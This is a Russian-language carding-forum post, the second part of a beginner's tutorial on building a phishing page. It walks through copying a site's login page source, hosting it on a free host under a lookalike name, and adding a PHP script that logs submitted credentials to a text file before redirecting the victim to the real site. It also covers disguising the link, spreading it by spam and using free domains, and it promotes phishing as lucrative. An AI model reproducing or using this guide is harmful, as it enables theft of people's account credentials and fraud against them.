Есть желание узнать детальней что есть кардинг и как для вас данная информация поможет в текущей жизни? Когда все так в таком случае без сомнений обращайтесь на форум кардеров в каковом можно прочитать про новшества и релизы из среды кардига, а также увеличите личные познания в представленной сфере. Приветствую всех снова, продолжаю предыдущую тему по основам фишинга. Почему разбил на две части? Отвечу.
Для того чтобы после прочтения первой статьи, отсеялась квота людей которых фишинг не зацепил, а для тех кому это стало все же интересным я продолжу.
Итак, базовое руководство по созданию фишинг страницы.
1.Что такое фишер?
2.Создаем Т35 аккаунт.
3.Получение Source Code (исходный код, код элемента) веб страницы.
4.Как создать Фиш файл.
5.Как это работает и вапще.
1.Фишер- это фейковая login page (страница авторизации) к аккаунту кого-нибудь. Когда кто-то логинится (авторизуется) на фейковой странице, его username:password попадает к вам в руки.
2.Для того чтобы создать фишер, вам понадобится хостинговый сайт, я рекомендую Т35. Регаемся в бесплатный аккаунт и называем его палканаебалка.spam.com Например : yahoo.spam.com. Ну так как это имя уже будет занято добавляем номер типа 08 или 07, только ради того, что выбранное вами название страницы может и будет уже занято.
3.После того как вы создатите фишер страницу, топайте на страницу сайта, с которого вы хотите сделать фишер.
Откройте страницу авторизации, клацните правой кнопкой мыши на странице и выберите Просмотр Кода элемента, либо Посмотреть исходный код ,либо View Source зависит какой у вас браузер. Скопируйте то, что вам выпадет. Да, прямо все что выпадет в окне.
4.Фиш файл. После того как вы скопируете ваш код элемента, топайте в свой Т35 аккаунт. Нажмите "New File" ну и назовите login.htm.
Затем вставьте ваш исходный код (который вы скопировали со страницы авторизации сайта который вы хотите фишить) Сохраняем.
Теперь создайте другой файл и назовите его fhish.php и внутри его вставьте это:
Цитата
header("Location: http://www.phisshed-website.com");
$handle = fopen("thepasses.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
http://www.phisshed-website.com это та страница на которую попадает ваша жертва после авторизации..суть уловили? То есть если это фейсбук или палка, то просто вставляем ссылку на их сайт.
Сохраняем файл.
Возвращаемся на вашу login.htm и нажимаем "редактировать" или "edit". Нажимаем CTRL+F и пишем action=
Ищем пока не найдем то где сказано action=(что-то что нужно сделать с авторизацией) ну пошевелите серой массой, а?
Замените его на ваш fhish.php Урааааа, у вас есть фишер.
5.
Вот и пришло время фишинговать :)/>
НО, вам нужно замаскировать ваш фишер.
Т35палканаебалка.spam.com/login.htm
Вот это как раз и есть ссылка на ваш фишер. Когда кто-то авторизуется в ней, вы получите пароль в password.txt файле, которой будет создан как только кто-то что-то туда впишет. Но вам же нужно обмануть людей (Боже, к чему я только Вас склоняю, гореть мне в аду за это)
Пишем
*настоящее имя сайта".com/login.php
Вы делаете то же самое на любом форуме :)/>
Хочу сказать, что это только верхушка айсберга, фишинг колоссальное ремесло и искусство, которое способно приносить оооочень хорошие деньги. Не забывайте о том, что вам нужно распространять вашу ссылку, это уже Спамминг, об этом позже :)/> Если что-то упустил, не обессудьте, 4.40 утра, малость не соображаю уже.
Кстати, если кому не понравится использовать spam.com попробуйте ripway.com и после того как вы загрузите все ваши файлы, топайте на http://www.dot.tk и выберите бесплатный .tk домен.
Специально для ccc.sb
|
